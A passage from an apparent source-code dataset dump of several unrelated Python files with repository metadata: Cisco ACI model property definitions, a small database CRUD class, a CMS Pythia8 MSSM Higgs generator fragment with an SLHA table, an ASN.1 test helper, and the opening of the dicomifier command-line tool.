prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "monPolDn", "monPolDn", 16152, PropCategory.REGULAR)
prop.label = "Monitoring policy attached to this observable object"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("monPolDn", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "pcEnfPref", "pcEnfPref", 16336, PropCategory.REGULAR)
prop.label = "Policy Control Enforcement"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 1
prop.defaultValueStr = "enforced"
prop._addConstant("enforced", "enforced", 1)
prop._addConstant("unenforced", "unenforced", 2)
meta.props.add("pcEnfPref", prop)
prop = PropMeta("str", "pcTag", "pcTag", 1808, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("any", "any", 0)
meta.props.add("pcTag", prop)
prop = PropMeta("str", "prefGrMemb", "prefGrMemb", 27676, PropCategory.REGULAR)
prop.label = "Preferred Group Member"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 2
prop.defaultValueStr = "exclude"
prop._addConstant("exclude", "exclude", 2)
prop._addConstant("include", "include", 1)
meta.props.add("prefGrMemb", prop)
prop = PropMeta("str", "prio", "prio", 1076, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 9)]
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("level1", "level1", 3)
prop._addConstant("level2", "level2", 2)
prop._addConstant("level3", "level3-(default)", 1)
prop._addConstant("level4", "level4", 9)
prop._addConstant("level5", "level5", 8)
prop._addConstant("level6", "level6", 7)
prop._addConstant("unspecified", "unspecified", 0)
meta.props.add("prio", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "scopeId", "scopeId", 1810, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(1, 16777215)]
prop.defaultValue = 1
prop.defaultValueStr = "1"
meta.props.add("scopeId", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "targetDscp", "targetDscp", 16092, PropCategory.REGULAR)
prop.label = "Dscp Value"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.defaultValue = 64
prop.defaultValueStr = "unspecified"
prop._addConstant("AF11", "af11-low-drop", 10)
prop._addConstant("AF12", "af12-medium-drop", 12)
prop._addConstant("AF13", "af13-high-drop", 14)
prop._addConstant("AF21", "af21-low-drop", 18)
prop._addConstant("AF22", "af22-medium-drop", 20)
prop._addConstant("AF23", "af23-high-drop", 22)
prop._addConstant("AF31", "af31-low-drop", 26)
prop._addConstant("AF32", "af32-medium-drop", 28)
prop._addConstant("AF33", "af33-high-drop", 30)
prop._addConstant("AF41", "af41-low-drop", 34)
prop._addConstant("AF42", "af42-medium-drop", 36)
prop._addConstant("AF43", "af43-high-drop", 38)
prop._addConstant("CS0", "cs0", 0)
prop._addConstant("CS1", "cs1", 8)
prop._addConstant("CS2", "cs2", 16)
prop._addConstant("CS3", "cs3", 24)
prop._addConstant("CS4", "cs4", 32)
prop._addConstant("CS5", "cs5", 40)
prop._addConstant("CS6", "cs6", 48)
prop._addConstant("CS7", "cs7", 56)
prop._addConstant("EF", "expedited-forwarding", 46)
prop._addConstant("VA", "voice-admit", 44)
prop._addConstant("unspecified", "unspecified", 64)
meta.props.add("targetDscp", prop)
prop = PropMeta("str", "txId", "txId", 21190, PropCategory.REGULAR)
prop.label = "Transaction Id when EPg was created"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("txId", prop)
prop = PropMeta("str", "useAnyDef", "useAnyDef", 17558, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("useAnyDef", prop)
meta.namingProps.append(getattr(meta.props, "epgDn"))
getattr(meta.props, "epgDn").needDelimiter = True
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("CtrctIfToEPgCons", "Contract Interface EPG Consumer", "cobra.model.fv.EPg"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("CtrctIfToEPgConsNwIf", "Contract Interface EPG Consumer Interface", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ABrCPToAnyProv", "Any To Provider", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ABrCPToAnyCons", "Any To Consumer", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ABrCPToEPgProv", "EPG Provider", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ABrCPToEPgCons", "EPG Consumer", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("GraphInstancesinacontract", "Graph Instances", "cobra.model.vns.GraphInst"))
def __init__(self, parentMoOrDn, epgDn, markDirty=True, **creationProps):
namingVals = [epgDn]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
8f2804428b63e25c8e704fb9def3a459ee42e87d | 3b1053429de896731fe659b8ea09efe5f8bdc4cb | /src/db/DBStpHardware.py | 902519e353ffa62e3425ec8e2b8cb150f10325d0 | [] | no_license | rajgu/machine-master | 57bb6f05fce5dfa512ecd10bc5e7bb31bbd76b8a | f1a6081c9bfde1937341a1a55478c08d48005f05 | refs/heads/master | 2020-03-26T22:09:14.058722 | 2018-08-20T15:42:00 | 2018-08-20T15:42:00 | 145,435,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | py | from src.db.Crud import Crud
class DBStpHardware(Crud):
_table_name = 'stp_hardware'
_table_struct = {
'stp_id' : {'type' : 'integer', 'validate' : True},
'type' : {'type' : 'text', 'validate' : True},
'name' : {'type' : 'text', 'validate' : True},
'serial_number': {'type' : 'text', 'validate' : True},
'location' : {'type' : 'text', 'validate' : True}
}
_horizontal_key = False
def __init__(self, db):
return Crud.__init__(self, db)
def create(self, data):
return Crud.create(self, data, self._table_name, self._table_struct, self._horizontal_key)
def read(self, data, oldata=False):
return Crud.read(self, data, self._table_name, self._table_struct, self._horizontal_key, oldata)
def update(self, data, where):
return Crud.update(self, data, where, self._table_name, self._table_struct, self._horizontal_key)
def delete(self, data):
return Crud.delete(self, data, self._table_name, self._table_struct, self._horizontal_key)
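# Minimal usage sketch (assumes an already-configured `db` handle):
#   hw = DBStpHardware(db)
#   hw.create({'stp_id': 1, 'type': 'sensor', 'name': 'probe-A',
#              'serial_number': 'SN-0001', 'location': 'bay 2'})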
| [
"="
] | = |
d57266dab8d5af22860b6ec60667e9dc907af33f | 0fccee4c738449f5e0a8f52ea5acabf51db0e910 | /genfragments/ThirteenTeV/MSSM_HiggsToMuMu/fragment_mhmodp_MA400_tb20_bbH.py | 29e5b0fcac451a27f7c6bbc2d0d18d8dbe8f4c9b | [] | no_license | cms-sw/genproductions | f308ffaf3586c19b29853db40e6d662e937940ff | dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4 | refs/heads/master | 2023-08-30T17:26:02.581596 | 2023-08-29T14:53:43 | 2023-08-29T14:53:43 | 11,424,867 | 69 | 987 | null | 2023-09-14T12:41:28 | 2013-07-15T14:18:33 | Python | UTF-8 | Python | false | false | 18,020 | py | COM_ENERGY = 13000.0 # GeV
CROSS_SECTION = 1 # pb
PROCESS = 'HiggsBSM:gg2H2bbbar = on'
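# Pythia8 BSM flag: g g -> H2 (heavy CP-even Higgs) in association with a
# b bbar pair, i.e. the bbH production mode named in this fragment's filename.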
SLHA_TABLE = """BLOCK SPINFO
1 FeynHiggs
2 2.12.0
2 built on ott 13, 2016
BLOCK MODSEL
1 0 # Model
2 1 # GridPts
3 0 # Content
4 0 # RPV
5 0 # CPV
6 0 # FV
BLOCK SMINPUTS
1 1.28952828E+02 # invAlfaMZ
2 1.16637000E-05 # GF
3 1.19000000E-01 # AlfasMZ
4 9.11876000E+01 # MZ
5 4.16000000E+00 # Mb
6 1.73200000E+02 # Mt
7 1.77703000E+00 # Mtau
11 5.10998902E-04 # Me
13 1.05658357E-01 # Mmu
21 6.00000000E-03 # Md
22 3.00000000E-03 # Mu
23 9.50000000E-02 # Ms
24 1.28600000E+00 # Mc
BLOCK MINPAR
3 2.00000000E+01 # TB
BLOCK EXTPAR
0 0.00000000E+00 # Q
1 9.54716519E+01 # M1
2 2.00000000E+02 # M2
3 1.50000000E+03 # M3
11 1.51000000E+03 # At
12 1.51000000E+03 # Ab
13 1.51000000E+03 # Atau
23 2.00000000E+02 # MUE
25 2.00000000E+01 # TB
26 4.00000000E+02 # MA0
27 4.07999802E+02 # MHp
31 5.00000000E+02 # MSL(1)
32 5.00000000E+02 # MSL(2)
33 1.00000000E+03 # MSL(3)
34 5.00000000E+02 # MSE(1)
35 5.00000000E+02 # MSE(2)
36 1.00000000E+03 # MSE(3)
41 1.50000000E+03 # MSQ(1)
42 1.50000000E+03 # MSQ(2)
43 1.00000000E+03 # MSQ(3)
44 1.50000000E+03 # MSU(1)
45 1.50000000E+03 # MSU(2)
46 1.00000000E+03 # MSU(3)
47 1.50000000E+03 # MSD(1)
48 1.50000000E+03 # MSD(2)
49 1.00000000E+03 # MSD(3)
BLOCK MASS
1000012 4.95845890E+02 # MSf(1,1,1)
1000011 5.02289514E+02 # MSf(1,2,1)
2000011 5.01838716E+02 # MSf(2,2,1)
1000002 1.49903009E+03 # MSf(1,3,1)
2000002 1.49959059E+03 # MSf(2,3,1)
1000001 1.50117388E+03 # MSf(1,4,1)
2000001 1.50020460E+03 # MSf(2,4,1)
1000014 4.95845890E+02 # MSf(1,1,2)
1000013 5.02541395E+02 # MSf(1,2,2)
2000013 5.01586505E+02 # MSf(2,2,2)
1000004 1.49903061E+03 # MSf(1,3,2)
2000004 1.49959117E+03 # MSf(2,3,2)
1000003 1.50118944E+03 # MSf(1,4,2)
2000003 1.50018903E+03 # MSf(2,4,2)
1000016 9.97929430E+02 # MSf(1,1,3)
1000015 9.98819801E+02 # MSf(1,2,3)
2000015 1.00324582E+03 # MSf(2,2,3)
1000006 8.76429378E+02 # MSf(1,3,3)
2000006 1.13478243E+03 # MSf(2,3,3)
1000005 9.96111023E+02 # MSf(1,4,3)
2000005 1.00594745E+03 # MSf(2,4,3)
25 1.24781549E+02 # Mh0
35 3.99966626E+02 # MHH
36 4.00000000E+02 # MA0
37 4.08364422E+02 # MHp
1000022 8.78206612E+01 # MNeu(1)
1000023 1.51359250E+02 # MNeu(2)
1000025 -2.10117348E+02 # MNeu(3)
1000035 2.66409088E+02 # MNeu(4)
1000024 1.47528170E+02 # MCha(1)
1000037 2.66764158E+02 # MCha(2)
1000021 1.50000000E+03 # MGl
BLOCK DMASS
0 1.73200000E+02 # Q
25 7.10837338E-01 # Delta Mh0
35 1.19120788E-03 # Delta MHH
36 0.00000000E+00 # Delta MA0
37 1.73007786E-02 # Delta MHp
BLOCK NMIX
1 1 9.30213894E-01 # ZNeu(1,1)
1 2 -1.18546783E-01 # ZNeu(1,2)
1 3 3.13311260E-01 # ZNeu(1,3)
1 4 -1.49949409E-01 # ZNeu(1,4)
2 1 -3.23202104E-01 # ZNeu(2,1)
2 2 -6.93891430E-01 # ZNeu(2,2)
2 3 5.08023191E-01 # ZNeu(2,3)
2 4 -3.94927234E-01 # ZNeu(2,4)
3 1 9.59510181E-02 # ZNeu(3,1)
3 2 -1.33592266E-01 # ZNeu(3,2)
3 3 -6.78206777E-01 # ZNeu(3,3)
3 4 -7.16227671E-01 # ZNeu(3,4)
4 1 -1.45037624E-01 # ZNeu(4,1)
4 2 6.97577558E-01 # ZNeu(4,2)
4 3 4.28700431E-01 # ZNeu(4,3)
4 4 -5.55486794E-01 # ZNeu(4,4)
BLOCK UMIX
1 1 -6.08113363E-01 # UCha(1,1)
1 2 7.93850198E-01 # UCha(1,2)
2 1 7.93850198E-01 # UCha(2,1)
2 2 6.08113363E-01 # UCha(2,2)
BLOCK VMIX
1 1 -7.93850198E-01 # VCha(1,1)
1 2 6.08113363E-01 # VCha(1,2)
2 1 6.08113363E-01 # VCha(2,1)
2 2 7.93850198E-01 # VCha(2,2)
BLOCK STAUMIX
1 1 6.88810103E-01 # USf(1,1)
1 2 7.24941820E-01 # USf(1,2)
2 1 7.24941820E-01 # USf(2,1)
2 2 -6.88810103E-01 # USf(2,2)
BLOCK STOPMIX
1 1 7.08249465E-01 # USf(1,1)
1 2 -7.05962248E-01 # USf(1,2)
2 1 7.05962248E-01 # USf(2,1)
2 2 7.08249465E-01 # USf(2,2)
BLOCK SBOTMIX
1 1 6.52799510E-01 # USf(1,1)
1 2 7.57530726E-01 # USf(1,2)
2 1 7.57530726E-01 # USf(2,1)
2 2 -6.52799510E-01 # USf(2,2)
BLOCK ALPHA
-5.91856359E-02 # Alpha
BLOCK DALPHA
1.87535199E-04 # Delta Alpha
BLOCK HMIX Q= -0.99900000E+03
1 2.00000000E+02 # MUE
2 2.00000000E+01 # TB
BLOCK MSOFT Q= 0.00000000E+00
1 9.54716519E+01 # M1
2 2.00000000E+02 # M2
3 1.50000000E+03 # M3
31 5.00000000E+02 # MSL(1)
32 5.00000000E+02 # MSL(2)
33 1.00000000E+03 # MSL(3)
34 5.00000000E+02 # MSE(1)
35 5.00000000E+02 # MSE(2)
36 1.00000000E+03 # MSE(3)
41 1.50000000E+03 # MSQ(1)
42 1.50000000E+03 # MSQ(2)
43 1.00000000E+03 # MSQ(3)
44 1.50000000E+03 # MSU(1)
45 1.50000000E+03 # MSU(2)
46 1.00000000E+03 # MSU(3)
47 1.50000000E+03 # MSD(1)
48 1.50000000E+03 # MSD(2)
49 1.00000000E+03 # MSD(3)
BLOCK AE Q= 0.00000000E+00
1 1 0.00000000E+00 # Af(1,1)
2 2 0.00000000E+00 # Af(2,2)
3 3 1.51000000E+03 # Af(3,3)
BLOCK AU Q= 0.00000000E+00
1 1 0.00000000E+00 # Af(1,1)
2 2 0.00000000E+00 # Af(2,2)
3 3 1.51000000E+03 # Af(3,3)
BLOCK AD Q= 0.00000000E+00
1 1 0.00000000E+00 # Af(1,1)
2 2 0.00000000E+00 # Af(2,2)
3 3 1.51000000E+03 # Af(3,3)
BLOCK YE Q= 0.00000000E+00
1 1 5.87736714E-05 # Yf(1,1)
2 2 1.21525301E-02 # Yf(2,2)
3 3 2.04389044E-01 # Yf(3,3)
BLOCK YU Q= 0.00000000E+00
1 1 1.72525825E-05 # Yf(1,1)
2 2 7.39560703E-03 # Yf(2,2)
3 3 9.96049095E-01 # Yf(3,3)
BLOCK YD Q= 0.00000000E+00
1 1 6.76269414E-04 # Yf(1,1)
2 2 1.07071436E-02 # Yf(2,2)
3 3 4.49839737E-01 # Yf(3,3)
BLOCK VCKMIN
1 2.25300000E-01 # lambda
2 8.08000000E-01 # A
3 1.32000000E-01 # rhobar
4 3.41000000E-01 # etabar
BLOCK MSL2 Q= 0.00000000E+00
1 1 2.50000000E+05 # MSL2(1,1)
2 2 2.50000000E+05 # MSL2(2,2)
3 3 1.00000000E+06 # MSL2(3,3)
BLOCK MSE2 Q= 0.00000000E+00
1 1 2.50000000E+05 # MSE2(1,1)
2 2 2.50000000E+05 # MSE2(2,2)
3 3 1.00000000E+06 # MSE2(3,3)
BLOCK MSQ2 Q= 0.00000000E+00
1 1 2.25000000E+06 # MSQ2(1,1)
2 2 2.25000000E+06 # MSQ2(2,2)
3 3 1.00000000E+06 # MSQ2(3,3)
BLOCK MSU2 Q= 0.00000000E+00
1 1 2.25000000E+06 # MSU2(1,1)
2 2 2.25000000E+06 # MSU2(2,2)
3 3 1.00000000E+06 # MSU2(3,3)
BLOCK MSD2 Q= 0.00000000E+00
1 1 2.25000000E+06 # MSD2(1,1)
2 2 2.25000000E+06 # MSD2(2,2)
3 3 1.00000000E+06 # MSD2(3,3)
BLOCK TE Q= 0.00000000E+00
1 1 0.00000000E+00 # Tf(1,1)
2 2 0.00000000E+00 # Tf(2,2)
3 3 3.08627457E+02 # Tf(3,3)
BLOCK TU Q= 0.00000000E+00
1 1 0.00000000E+00 # Tf(1,1)
2 2 0.00000000E+00 # Tf(2,2)
3 3 1.50403413E+03 # Tf(3,3)
BLOCK TD Q= 0.00000000E+00
1 1 0.00000000E+00 # Tf(1,1)
2 2 0.00000000E+00 # Tf(2,2)
3 3 6.79258003E+02 # Tf(3,3)
BLOCK SELMIX
1 1 9.99989805E-01 # UASf(1,1)
1 4 -4.51557869E-03 # UASf(1,4)
2 2 8.57926156E-01 # UASf(2,2)
2 5 -5.13773015E-01 # UASf(2,5)
3 3 6.88810103E-01 # UASf(3,3)
3 6 7.24941820E-01 # UASf(3,6)
4 1 4.51557869E-03 # UASf(4,1)
4 4 9.99989805E-01 # UASf(4,4)
5 2 5.13773015E-01 # UASf(5,2)
5 5 8.57926156E-01 # UASf(5,5)
6 3 7.24941820E-01 # UASf(6,3)
6 6 -6.88810103E-01 # UASf(6,6)
BLOCK USQMIX
1 1 1.00000000E+00 # UASf(1,1)
1 4 1.78495859E-05 # UASf(1,4)
2 2 9.99970732E-01 # UASf(2,2)
2 5 7.65085064E-03 # UASf(2,5)
3 3 7.08249465E-01 # UASf(3,3)
3 6 -7.05962248E-01 # UASf(3,6)
4 1 -1.78495859E-05 # UASf(4,1)
4 4 1.00000000E+00 # UASf(4,4)
5 2 -7.65085064E-03 # UASf(5,2)
5 5 9.99970732E-01 # UASf(5,5)
6 3 7.05962248E-01 # UASf(6,3)
6 6 7.08249465E-01 # UASf(6,6)
BLOCK DSQMIX
1 1 9.99967318E-01 # UASf(1,1)
1 4 -8.08468495E-03 # UASf(1,4)
2 2 9.92157399E-01 # UASf(2,2)
2 5 -1.24994779E-01 # UASf(2,5)
3 3 6.52799510E-01 # UASf(3,3)
3 6 7.57530726E-01 # UASf(3,6)
4 1 8.08468495E-03 # UASf(4,1)
4 4 9.99967318E-01 # UASf(4,4)
5 2 1.24994779E-01 # UASf(5,2)
5 5 9.92157399E-01 # UASf(5,5)
6 3 7.57530726E-01 # UASf(6,3)
6 6 -6.52799510E-01 # UASf(6,6)
BLOCK CVHMIX
1 1 9.99992809E-01 # UH(1,1)
1 2 3.79243860E-03 # UH(1,2)
1 3 0.00000000E+00 # UH(1,3)
2 1 -3.79243860E-03 # UH(2,1)
2 2 9.99992809E-01 # UH(2,2)
2 3 0.00000000E+00 # UH(2,3)
3 1 0.00000000E+00 # UH(3,1)
3 2 0.00000000E+00 # UH(3,2)
3 3 1.00000000E+00 # UH(3,3)
DECAY 25 4.70802959E-03 # Gamma(h0)
1.95418610E-03 2 22 22 # BR(h0 -> photon photon)
1.23214280E-03 2 22 23 # BR(h0 -> photon Z)
2.21729624E-02 2 23 23 # BR(h0 -> Z Z)
1.83961619E-01 2 -24 24 # BR(h0 -> W W)
5.88903166E-02 2 21 21 # BR(h0 -> gluon gluon)
5.90818475E-09 2 -11 11 # BR(h0 -> Electron electron)
2.62806421E-04 2 -13 13 # BR(h0 -> Muon muon)
7.54101270E-02 2 -15 15 # BR(h0 -> Tau tau)
1.70825517E-07 2 -2 2 # BR(h0 -> Up up)
2.36610068E-02 2 -4 4 # BR(h0 -> Charm charm)
9.60581224E-07 2 -1 1 # BR(h0 -> Down down)
2.41233185E-04 2 -3 3 # BR(h0 -> Strange strange)
6.32212462E-01 2 -5 5 # BR(h0 -> Bottom bottom)
DECAY 35 3.20412715E+00 # Gamma(HH)
-2.77755084E-06 2 22 22 # BR(HH -> photon photon)
-6.07158389E-06 2 22 23 # BR(HH -> photon Z)
-2.06273466E-04 2 23 23 # BR(HH -> Z Z)
-4.48600531E-04 2 -24 24 # BR(HH -> W W)
-2.23155914E-04 2 21 21 # BR(HH -> gluon gluon)
-7.92628201E-09 2 -11 11 # BR(HH -> Electron electron)
3.52698464E-04 2 -13 13 # BR(HH -> Muon muon)
-9.95886348E-02 2 -15 15 # BR(HH -> Tau tau)
-1.88056182E-12 2 -2 2 # BR(HH -> Up up)
-2.60226149E-07 2 -4 4 # BR(HH -> Charm charm)
-3.12544644E-03 2 -6 6 # BR(HH -> Top top)
-9.99612224E-07 2 -1 1 # BR(HH -> Down down)
-2.51030942E-04 2 -3 3 # BR(HH -> Strange strange)
-6.17460245E-01 2 -5 5 # BR(HH -> Bottom bottom)
-1.16051885E-01 2 -1000024 1000024 # BR(HH -> Chargino1 chargino1)
-2.60240183E-02 2 1000022 1000022 # BR(HH -> neutralino1 neutralino1)
-5.41742353E-02 2 1000022 1000023 # BR(HH -> neutralino1 neutralino2)
-4.41526813E-02 2 1000022 1000025 # BR(HH -> neutralino1 neutralino3)
-2.89447512E-06 2 1000022 1000035 # BR(HH -> neutralino1 neutralino4)
-1.81352647E-02 2 1000023 1000023 # BR(HH -> neutralino2 neutralino2)
-1.72404807E-02 2 1000023 1000025 # BR(HH -> neutralino2 neutralino3)
-2.55233739E-03 2 25 25 # BR(HH -> h0 h0)
DECAY 36 3.90369787E+00 # Gamma(A0)
5.57176736E-06 2 22 22 # BR(A0 -> photon photon)
1.29289276E-05 2 22 23 # BR(A0 -> photon Z)
1.69592894E-04 2 21 21 # BR(A0 -> gluon gluon)
6.51102145E-09 2 -11 11 # BR(A0 -> Electron electron)
2.89723220E-04 2 -13 13 # BR(A0 -> Muon muon)
8.18418538E-02 2 -15 15 # BR(A0 -> Tau tau)
1.08202483E-12 2 -2 2 # BR(A0 -> Up up)
1.50152746E-07 2 -4 4 # BR(A0 -> Charm charm)
7.24672723E-03 2 -6 6 # BR(A0 -> Top top)
8.21480267E-07 2 -1 1 # BR(A0 -> Down down)
2.06296952E-04 2 -3 3 # BR(A0 -> Strange strange)
5.07481614E-01 2 -5 5 # BR(A0 -> Bottom bottom)
2.37952527E-01 2 -1000024 1000024 # BR(A0 -> Chargino1 chargino1)
2.94212998E-02 2 1000022 1000022 # BR(A0 -> neutralino1 neutralino1)
7.83260369E-02 2 1000022 1000023 # BR(A0 -> neutralino1 neutralino2)
1.34210317E-02 2 1000022 1000025 # BR(A0 -> neutralino1 neutralino3)
1.48734679E-04 2 1000022 1000035 # BR(A0 -> neutralino1 neutralino4)
4.13778850E-02 2 1000023 1000023 # BR(A0 -> neutralino2 neutralino2)
1.82692714E-03 2 1000023 1000025 # BR(A0 -> neutralino2 neutralino3)
2.70271220E-04 2 23 25 # BR(A0 -> Z h0)
3.11250143E-35 2 25 25 # BR(A0 -> h0 h0)
DECAY 37 2.36360435E+00 # Gamma(Hp)
1.14378215E-08 2 -11 12 # BR(Hp -> Electron nu_e)
4.89002442E-04 2 -13 14 # BR(Hp -> Muon nu_mu)
1.38317284E-01 2 -15 16 # BR(Hp -> Tau nu_tau)
1.30513154E-06 2 -1 2 # BR(Hp -> Down up)
1.48741764E-05 2 -3 2 # BR(Hp -> Strange up)
8.72688321E-06 2 -5 2 # BR(Hp -> Bottom up)
7.23912198E-08 2 -1 4 # BR(Hp -> Down charm)
3.26888781E-04 2 -3 4 # BR(Hp -> Strange charm)
1.22205242E-03 2 -5 4 # BR(Hp -> Bottom charm)
9.71601512E-07 2 -1 6 # BR(Hp -> Down top)
2.15008667E-05 2 -3 6 # BR(Hp -> Strange top)
5.87063081E-01 2 -5 6 # BR(Hp -> Bottom top)
1.55173525E-01 2 1000022 1000024 # BR(Hp -> neutralino1 chargino1)
2.26104275E-03 2 1000022 1000037 # BR(Hp -> neutralino1 chargino2)
2.25127136E-02 2 1000023 1000024 # BR(Hp -> neutralino2 chargino1)
9.20758052E-02 2 1000024 1000025 # BR(Hp -> chargino1 neutralino3)
5.11096070E-04 2 24 25 # BR(Hp -> W h0)
2.34647524E-08 2 24 35 # BR(Hp -> W HH)
2.30058550E-08 2 24 36 # BR(Hp -> W A0)
DECAY 6 1.37127534E+00 # Gamma(top)
1.00000000E+00 2 5 24 # BR(top -> bottom W)
"""
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1),
pythiaHepMCVerbosity = cms.untracked.bool(False),
SLHATableForPythia8 = cms.string('%s' % SLHA_TABLE),
comEnergy = cms.double(COM_ENERGY),
crossSection = cms.untracked.double(CROSS_SECTION),
maxEventsToPrint = cms.untracked.int32(1),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'Higgs:useBSM = on',
PROCESS,
'SLHA:allowUserOverride = off',
'SLHA:minMassSM = 100.',
'PhaseSpace:mHatMin = 56.0'
),
parameterSets = cms.vstring(
'pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters'
)
)
)
ProductionFilterSequence = cms.Sequence(generator)
| [
"[email protected]"
] | |
aba2a884d4f2b0a73725dccefc5950fbfc7e745e | 74afe97073a0693042d31567ba1a5741bcdebf72 | /tests/utils.py | 82762100c4b3ab85ace2b7d2ff312d3fe836d466 | [
"Apache-2.0"
] | permissive | bruvio/tinyber | 82aa34a5cdf842caa0f863540b249e37ae09fc78 | d20d33341f9e74ba9b699553a8cf6448c167dec9 | refs/heads/master | 2021-05-29T23:07:58.841678 | 2015-07-23T23:24:52 | 2015-07-23T23:24:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 894 | py | from asn1ate import parser
from asn1ate.sema import *
from tinyber.walker import Walker
from tinyber.py_nodes import PythonBackend as Backend
from tinyber import py_nodes as nodes
def generate(infilename, outfilename):
class FakeArgs(object):
no_standalone = False
import os
with open(infilename) as f:
asn1def = f.read()
parse_tree = parser.parse_asn1(asn1def)
modules = build_semantic_model(parse_tree)
assert (len(modules) == 1)
module_name = outfilename
path = "tests"
args = FakeArgs()
# pull in the python-specific node implementations
walker = Walker(modules[0], nodes)
walker.walk()
backend = Backend(args, walker, module_name, path)
backend.generate_code()
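# Minimal usage sketch (hypothetical file names, output path assumed):
#   generate('tests/foo.asn1', 'foo_ber') parses the ASN.1 module and
#   writes the generated codec to tests/foo_ber.py.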
def test_reload():
    import sys
    sys.path[:0] = ['.']  # prepend as a list; a bare string only works by accident
    # reload tests since we just created a new module
    import tests
    try:
        from importlib import reload  # Python 3
    except ImportError:
        pass  # Python 2: reload is a builtin
    reload(tests)
| [
"[email protected]"
] | |
7aa513a018f1f1887b44be7689dd657b6c9f8ed5 | fc20620a1fe41c83cb4c17ce36e5d3e6d5dd58fa | /src/python/dicomifier/__main__.py | b0fac30dd2023b3cfec7b87015b30eef36314d09 | [
"LicenseRef-scancode-cecill-b-en"
] | permissive | lamyj/dicomifier | bdd3ad5756563365fe59a31166cbcaa14f98603f | 8601760917f7ef47d87fbd61d2c647c3d9cbeb3e | refs/heads/master | 2023-04-28T15:45:52.571809 | 2023-04-20T15:50:03 | 2023-04-20T15:50:03 | 32,533,252 | 33 | 11 | NOASSERTION | 2022-09-12T16:53:20 | 2015-03-19T16:28:40 | Python | UTF-8 | Python | false | false | 1,955 | py | #########################################################################
# Dicomifier - Copyright (C) Universite de Strasbourg
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
#########################################################################
import argparse
import logging
import sys
from . import commands
def main():
parser = argparse.ArgumentParser(description="Dicomifier")
parser.add_argument(
"--verbosity", "-v", dest="main_verbosity",
choices=["warning", "info", "debug"], default="warning")
